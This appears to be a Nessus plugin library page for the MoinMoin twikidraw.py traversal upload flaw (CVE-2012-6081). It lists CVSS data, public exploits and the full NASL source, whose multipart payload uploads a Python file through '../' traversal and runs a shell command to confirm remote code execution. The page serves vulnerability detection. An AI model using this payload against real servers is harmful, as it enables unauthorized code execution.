MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite - Nessus

High   Plugin ID: 63638

This page contains detailed information about the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 63638
Name: MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite
Filename: moinmoin_twikidraw_code_exec.nasl
Vulnerability Published: 2012-12-29
This Plugin Published: 2013-01-21
Last Modification Time: 2022-04-11
Plugin Version: 1.20
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: moinmoin_detect.nasl
Required KB Items [?]: www/moinmoin
Excluded KB Items: Settings/disable_cgi_scanning

Vulnerability Information

Severity: High
Vulnerability Published: 2012-12-29
Patch Published: 2012-12-29
CVE [?]: CVE-2012-6081, CVE-2012-6495
CPE [?]: cpe:/a:moinmo:moinmoin

Synopsis

A wiki application on the remote web server is affected by a code execution vulnerability.

Description

The MoinMoin install hosted on the remote web server fails to properly sanitize user-supplied input in the twikidraw (action/twikidraw.py) action. A remote, unauthenticated attacker could utilize a specially crafted request using directory traversal style characters to upload a file containing arbitrary code to the remote host. An attacker could then execute the code with the privileges of the user that runs the MoinMoin process. Successful exploitation requires that the MoinMoin plugin directory has write permission set for the MoinMoin server user.

Note that the 'anywikidraw' action is reportedly also affected by the directory traversal and code execution vulnerabilities. The application is also reportedly affected by an additional directory traversal vulnerability in the action/AttachFile.py script (CVE-2012-6080) as well as a cross-site scripting (XSS) vulnerability when creating an rss link (CVE-2012-6082). Nessus has not, however, tested for these additional issues.

Solution

Upgrade to version 1.9.6 or later.

Public Exploits

Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Immunity Canvas, D2 Elliot)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite vulnerability:

  1. Metasploit: exploit/unix/webapp/moinmoin_twikidraw
    [MoinMoin twikidraw Action Traversal File Upload]
  2. Exploit-DB: exploits/linux/remote/26422.rb
    [EDB-26422: MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)]
  3. Exploit-DB: exploits/php/webapps/25304.py
    [EDB-25304: MoinMoin - Arbitrary Command Execution]
  4. D2 Elliot: moinmoin_1.9.5_rce.html
    [MoinMoin 1.9.5 RCE]
  5. Immunity Canvas: CANVAS

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS Score Source [?]: CVE-2012-6495
CVSS V2 Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score:6.0 (Medium)
Impact Subscore:6.4
Exploitability Subscore:6.8
CVSS Temporal Score:5.0 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.0 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSS Base Score:8.8 (High)
Impact Subscore:5.9
Exploitability Subscore:2.8
CVSS Temporal Score:8.2 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.2 (High)

Go back to menu.

Plugin Source

This is the moinmoin_twikidraw_code_exec.nasl nessus plugin source code. This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof. 

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(63638);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-6081", "CVE-2012-6495");
  script_bugtraq_id(57082, 57147);
  script_xref(name:"EDB-ID", value:"25304");

  script_name(english:"MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite");

  script_set_attribute(attribute:"synopsis", value:
"A wiki application on the remote web server is affected by a code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The MoinMoin install hosted on the remote web server fails to properly
sanitize user-supplied input in the twikidraw (action/twikidraw.py)
action.  A remote, unauthenticated attacker could utilize a specially
crafted request using directory traversal style characters to upload a
file containing arbitrary code to the remote host.  An attacker could
then execute the code with the privileges of the user that runs the
MoinMoin process.  Successful exploitation requires that the MoinMoin
plugin directory has write permission set for the MoinMoin server user. 

Note that the 'anywikidraw' action is reportedly also affected by the
directory traversal and code execution vulnerabilities.  The application
is also reportedly affected by an additional directory traversal
vulnerability in the action/AttachFile.py script (CVE-2012-6080) as well
as a cross-site scripting (XSS) vulnerability when creating an rss link
(CVE-2012-6082).  Nessus has not, however, tested for these additional
issues.");
  script_set_attribute(attribute:"see_also", value:"http://moinmo.in/SecurityFixes");
  script_set_attribute(attribute:"see_also", value:"http://moinmo.in/SecurityFixes/CVE-2012-6081");
  # http://www.h-online.com/security/news/item/Hackers-gain-access-to-all-edu-domains-1858471.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1f8ddc57");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.9.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-6495");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"MoinMoin 1.9.5 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'MoinMoin twikidraw Action Traversal File Upload');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/12/29");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/12/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/01/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("moinmoin_detect.nasl");
  script_require_keys("www/moinmoin");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:80);

install = get_install_from_kb(
  appname:"moinmoin",
  port:port,
  exit_on_fail:TRUE
);

dir = install["dir"];
install_url = build_url(qs:dir, port:port);

# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';
  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";


# Check permissions on WikiSandBox page
res = http_send_recv3(
  method       : "GET",
  item         : dir + "/WikiSandBox",
  port         : port,
  exit_on_fail : TRUE
);

if ("Edit (Text)" >!< res[2] || "Edit (GUI)" >!< res[2])
  exit(0, "Authentication is required to test the" + "MoinMoin install at " + install_url + ".");

# Grab a ticket hash needed for the exploit
url = "/WikiSandBox?action=twikidraw&do=modify&target=../../../../data/plugin/action/nessus.py";

res = http_send_recv3(
  method       : "GET",
  item         : dir + url,
  port         : port,
  exit_on_fail : TRUE
);

# Versions 1.9.x < 1.9.2 do not use a ticket hash
# Versions 1.9.2 and up do require this value
pat = "&amp;ticket=(.+)&amp;";
match = eregmatch(pattern:pat, string:res[2]);
if (!isnull(match)) ticket = match[1];
else ticket = "";

# Check for escaping in versions >= 1.9.6 which indicate a non-affected instance
pat2 = 'param name="basename" value="(.._)+';
match2 = eregmatch(pattern:pat2, string:res[2]);
if (!isnull(match2))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "MoinMoin", install_url);

# variables for our loop
vuln = FALSE;
vuln2 = FALSE;

foreach cmd (cmds)
{
  script = (SCRIPT_NAME - ".nasl");
  script =  str_replace(string:script, find:"_", replace:"");
  exp_script = script + unixtime() + ".py";

  # Define our exploits
  # Unix exploit
  unix_exploit = '--89692781418184\nContent-Disposition: form-data;' +
    ' name="filename"\n\ndrawing.r if()else[]\nimport os\ndef execute(p,r):' +
    'exec"print>>r,os\\56popen(' + "'" + cmd + "&&pwd'" + ")\56read()" +
    '"\n--89692781418184\nContent-Disposition: form-data; name="filepath"; ' +
    'filename="drawing.png"\nContent-Type: image/png\n\nMoinMoin error' +
    '\n\n--89692781418184--';

  # Windows exploit
  win_exploit = '--89692781418184\nContent-Disposition: form-data; ' +
    'name="filename"\n\n"\n--89692781418184\nContent-Disposition: form-data;' +
    ' name="filepath"; filename="drawing.png"\nContent-Type: image/png\n\n' +
    'MoinMoin error\ndrawing.r if()else[]\nimport os\ndef execute(p,r):exec"' +
    'print>>r,os\\56popen(' + "'" + cmd + "&& dir'" + ")\56read()" +
    '"\n\n--89692781418184--';

  if (cmd == 'id') exploit = unix_exploit;
  else exploit = win_exploit;

  # Upload our file
  url = "?action=twikidraw&do=save&ticket=" + ticket +
    "&target=../../../../data/plugin/action/" + exp_script;

  res = http_send_recv3(
    method       : "POST",
    item         : dir + "/WikiSandBox" + url,
    add_headers  : make_array("Content-Type",
                   "multipart/form-data; boundary=89692781418184"),
    data         : exploit,
    port         : port,
    exit_on_fail : TRUE
  );
  exp_request = http_last_sent_request();
  upload = res[2];

  # Test code execution with our uploaded file
  check_url = "/WikiSandBox?action=" + (exp_script - ".py");
  res = http_send_recv3(
    method       : "GET",
    item         : dir + check_url,
    port         : port,
    exit_on_fail : TRUE
  );

  # Extract path for reporting. /data/plugin/action is where upload will reside
  if (cmd == 'id')
  {
    get_path = strstr(res[2], "/");
    get_up_path = chomp(get_path) + "/data/plugin/action/" + script + "*";

    output = strstr(res[2], "uid") - get_path;
  }
  else
  {
    get_path = strstr(res[2], "Volume in drive");
    get_dir = egrep(pattern:"Directory of (.+)", string:get_path);
    get_up_path = chomp((get_dir - " Directory of ")) + "\data\plugin\action\"+
       script + "*";

    output = strstr(res[2], "Windows IP") - get_path;
  }

  match = egrep(pattern:cmd_pats[cmd], string:res[2]);


  # For CGI installs, plugins are activated on the next request
  if (match)
  {
    vuln = TRUE;
    break;
  }
  # For the standalone or twisted servers, plugins are activated after
  # restarting the MoinMoin server.
  # For FastCGI and mod_python, Apache needs a restart for exploit to work.
  else if (
   (isnull(upload)) &&
   (!vuln) &&
   ("<h1>Unhandled Exception</h1>" >!< res[2])
  )
  {
    vuln2 = TRUE;
    break;
  }
}

# Exit if upload and/or attack fail
if ((!vuln) && (!vuln2))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "MoinMoin", install_url);

# Reporting
if (report_verbosity > 0)
{
  snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);

  # Reporting for successful exploit
  if (vuln)
  {
    report =
      '\nNessus was able to verify the issue exists using the following request :' +
       '\n' +
       '\n' + install_url + check_url +
       '\n' +
       '\nNote: This file has not been removed by Nessus and will need to be' +
       '\nmanually deleted (' + get_up_path + ').' +
       '\n';
    if (report_verbosity > 1)
    {
      report +=
        '\nThis file was uploaded using the following request :' +
        '\n' +
        '\n' + snip +
        '\n' + exp_request +
        '\n' + snip +
        '\n' +
        '\n' + 'The file uploaded by Nessus executed the command "'+cmd+ '"' +
        '\nwhich produced the following output :' +
        '\n' +
        '\n' + snip +
        '\n' + chomp(output) +
        '\n' + snip +
        '\n';
    }
  }
  # Reporting for successful upload, but attack would require a server restart
  # in order for plugin to be activated
  else if (vuln2)
  {
    report =
      '\nNessus was able to upload a file to the remote host, however cannot' +
      '\nverify the issue exists until the web server has been restarted.' +
      '\nTo test the issue after restarting your webserver, you can use the' +
      '\nfollowing URL to verify the exploit :' +
      '\n' +
      '\n' + install_url + check_url +
      '\n' +
      '\nNote that this file has not been removed by Nessus and will need to' +
      '\nbe manually deleted (/data/plugin/action/' + script + '*).' +
      '\n';
    if (report_verbosity > 1)
    {
      report +=
        '\nThis file was uploaded using the following request :' +
        '\n' +
        '\n' + snip +
        '\n' + data_protection::sanitize_uid(output:exp_request) +
        '\n' + snip +
        '\n';
    }
  }
  security_warning(port:port, extra:report);
}
else security_warning(port);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/moinmoin_twikidraw_code_exec.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\moinmoin_twikidraw_code_exec.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/moinmoin_twikidraw_code_exec.nasl

Go back to menu.

How to Run

Here is how to run the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite plugin ID 63638.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 63356 - Debian DSA-2593-1 : moin - several vulnerabilities
  • 63636 - Fedora 18 : moin-1.9.6-1.fc18 (2013-0600)
  • 63655 - Fedora 16 : moin-1.9.6-1.fc16 (2013-0640)
  • 63656 - Fedora 17 : moin-1.9.6-1.fc17 (2013-0685)
  • 63397 - FreeBSD : moinmoin -- Multiple vulnerabilities (a264b1b0-5726-11e2-9483-14dae938ec40)
  • 70110 - GLSA-201309-14 : MoinMoin: Multiple vulnerabilities
  • 64930 - MoinMoin < 1.9.6 Multiple Vulnerabilities
  • 30055 - MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File Overwrite
  • 145193 - FreeBSD : moinmoin -- multiple vulnerabilities (abed4ff0-7da1-4236-880d-de33e4895315)
  • 143145 - openSUSE Security Update : moinmoin-wiki (openSUSE-2020-1966)
  • 142736 - Ubuntu 16.04 LTS / 18.04 LTS : MoinMoin vulnerabilities (USN-4629-1)

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file moinmoin_twikidraw_code_exec.nasl version 1.20. For more plugins, visit the Nessus Plugin Library.

Go back to menu.